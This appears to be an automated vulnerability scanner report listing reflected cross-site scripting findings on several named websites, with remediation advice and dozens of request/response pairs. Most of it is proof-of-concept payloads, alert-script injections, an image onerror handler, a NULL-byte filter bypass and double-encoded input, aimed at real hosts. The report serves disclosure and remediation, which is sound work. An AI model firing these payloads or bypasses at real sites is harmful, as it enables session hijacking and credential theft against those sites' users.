Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4ae33<script>alert(1)</script>3f481b83fd0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj4ae33<script>alert(1)</script>3f481b83fd0/1064/0/vj?ajecscp=1292033222620&z=1&dim=144&pos=1 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=0
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:49 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj4ae33<script>alert(1)</script>3f481b83fd0/1064/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 535c9<script>alert(1)</script>863c26eed60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj535c9<script>alert(1)</script>863c26eed60/1066/0/vj?ajecscp=1292033223014&z=1&dim=122&pos=2 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=0
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:47 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj535c9<script>alert(1)</script>863c26eed60/1066/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd490<script>alert(1)</script>ab50a3bc638 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ajcd490<script>alert(1)</script>ab50a3bc638/1067/0/vj?ajecscp=1292033223115&z=1&dim=122&pos=3 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=0
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:54 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /ajcd490<script>alert(1)</script>ab50a3bc638/1067/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b00b<script>alert(1)</script>b3037701840 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj8b00b<script>alert(1)</script>b3037701840/1081/0/vj?ajecscp=1292033223116&z=1&dim=157 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=0
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:52 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj8b00b<script>alert(1)</script>b3037701840/1081/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e2f43<script>alert(1)</script>d8e3c0cc6d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aje2f43<script>alert(1)</script>d8e3c0cc6d9/40616/0/vc?z=1&dim=24242 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:55 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aje2f43<script>alert(1)</script>d8e3c0cc6d9/40616/0/vc not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6f378<script>alert(1)</script>10839d6a71d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj6f378<script>alert(1)</script>10839d6a71d/40617/0/vj?ajecscp=1292033223081&z=1&dim=37872&pos=6 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=0
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:53 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj6f378<script>alert(1)</script>10839d6a71d/40617/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e1d3b<script>alert(1)</script>26e9ba91aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aje1d3b<script>alert(1)</script>26e9ba91aa/65356/0/vj?ajecscp=1292033222616&z=1&dim=65095 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=0
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:46 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aje1d3b<script>alert(1)</script>26e9ba91aa/65356/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc14a<script>alert(1)</script>390f95c0e85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ajdc14a<script>alert(1)</script>390f95c0e85/65357/0/vj?ajecscp=1292033222616&z=1&dim=65096 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=0
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:46 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /ajdc14a<script>alert(1)</script>390f95c0e85/65357/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3f915<script>alert(1)</script>cf68d7aa72a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj3f915<script>alert(1)</script>cf68d7aa72a/65358/0/vj?ajecscp=1292033222621&z=1&dim=65097 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=0
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:46 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj3f915<script>alert(1)</script>cf68d7aa72a/65358/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 79b53<script>alert(1)</script>2b6b3379968 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj79b53<script>alert(1)</script>2b6b3379968/82077/0/vj?ajecscp=1292033222615&z=1&dim=82071 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=0
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:46 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj79b53<script>alert(1)</script>2b6b3379968/82077/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 459a6<script>alert(1)</script>19da8255183 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj459a6<script>alert(1)</script>19da8255183/89985/0/vj?ajecscp=1292033222621&z=1&dim=89984 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=0
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:46 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj459a6<script>alert(1)</script>19da8255183/89985/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 19e64<script>alert(1)</script>8adee795dac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj19e64<script>alert(1)</script>8adee795dac/90120/0/vj?ajecscp=1292033222988&z=1&dim=90124 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=0
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:46 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj19e64<script>alert(1)</script>8adee795dac/90120/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8973d<script>alert(1)</script>4d1496bd2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj8973d<script>alert(1)</script>4d1496bd2c/90121/0/vj?z=1&dim=90125 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=0; ajess1_AE79DE12732E6B02887A6D2D=a; ajcmp=1!#{%MR{%P4{%PJ!!{*Oy
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:47 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj8973d<script>alert(1)</script>4d1496bd2c/90121/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 534d2<script>alert(1)</script>9711503da19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj534d2<script>alert(1)</script>9711503da19/90122/0/vj?ajecscp=1292033223090&z=1&dim=90126 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=0
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:52 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj534d2<script>alert(1)</script>9711503da19/90122/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b6800<script>alert(1)</script>bc05ef89ba3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ajb6800<script>alert(1)</script>bc05ef89ba3/90123/0/vj?ajecscp=1292033223073&z=1&dim=90127 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=0
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:52 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /ajb6800<script>alert(1)</script>bc05ef89ba3/90123/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 238f0<script>alert(1)</script>58bfc9e7ef7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj238f0<script>alert(1)</script>58bfc9e7ef7/93745/0/vj?ajecscp=1292033222976&z=1&dim=93742 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=0
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:46 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj238f0<script>alert(1)</script>58bfc9e7ef7/93745/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d483b<script>alert(1)</script>124a55fed3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ajd483b<script>alert(1)</script>124a55fed3b/93746/0/vj?ajecscp=1292033223001&z=1&dim=93743 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=0
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:52 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /ajd483b<script>alert(1)</script>124a55fed3b/93746/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 69faa<script>alert(1)</script>834d52d2b26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj69faa<script>alert(1)</script>834d52d2b26/93747/0/vj?ajecscp=1292033222985&z=1&dim=93744 HTTP/1.1 Host: aj.600z.com Proxy-Connection: keep-alive Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=0
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Sat, 11 Dec 2010 02:20:46 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj69faa<script>alert(1)</script>834d52d2b26/93747/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a5492"><script>alert(1)</script>98a3a1c58a5 was submitted in the REST URL parameter 1. This input was echoed as a5492"><script>alert(1)</script>98a3a1c58a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%00a5492"><script>alert(1)</script>98a3a1c58a5 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7cb08<img%20src%3da%20onerror%3dalert(1)>9ee651c84f9 was submitted in the REST URL parameter 1. This input was echoed as 7cb08<img src=a onerror=alert(1)>9ee651c84f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7cb08<img%20src%3da%20onerror%3dalert(1)>9ee651c84f9/LexUriServ.do HTTP/1.1 Host: eur-lex.europa.eu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Cache-Control: no-cache="set-cookie" Date: Sat, 11 Dec 2010 02:20:22 GMT Content-Type: text/html X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 83 Connection: close Set-Cookie: JSESSIONID=QsflNCfG4mHHGvBbpFC8v2SJGzLFXKJnLmCnn7g1G4cxxpKcKyz2!1864652219; path=/
Invalid path /7cb08<img src=a onerror=alert(1)>9ee651c84f9/LexUriServ was requested
1.21. http://kroll.com/include/document.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://kroll.com
Path:
/include/document.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c32b'-alert(1)-'8827b24bbbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /include/document.asp?9c32b'-alert(1)-'8827b24bbbf=1 HTTP/1.1 Host: kroll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=176843135.1292033507.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=176843135.1231045933.1292033507.1292033507.1292033507.1; __utmc=176843135; __utmb=176843135.1.10.1292033507; ASP.NET_SessionId=licmp0jhqg0pan243vatnhjv;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 11 Dec 2010 02:19:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 4169 Content-Type: text/html Set-Cookie: ASPSESSIONIDAABTQDSB=EKFGEPLAOIJHBLAFOMPHDIEJ; path=/ Cache-control: private
1.22. http://markmonitor.com/cta/wp-6steps/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://markmonitor.com
Path:
/cta/wp-6steps/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac091"><a>818754f36d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-6steps/?ac091"><a>818754f36d7=1 HTTP/1.1 Host: markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:19:36 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 31984 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/wp-6steps/?ac091"><a>818754f36d7=1" id="campaign-form"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1055%253cscript%253ealert%25281%2529%253c%252fscript%253ee5e225c0fd4 was submitted in the REST URL parameter 1. This input was echoed as f1055<script>alert(1)</script>e5e225c0fd4 in the application's response.
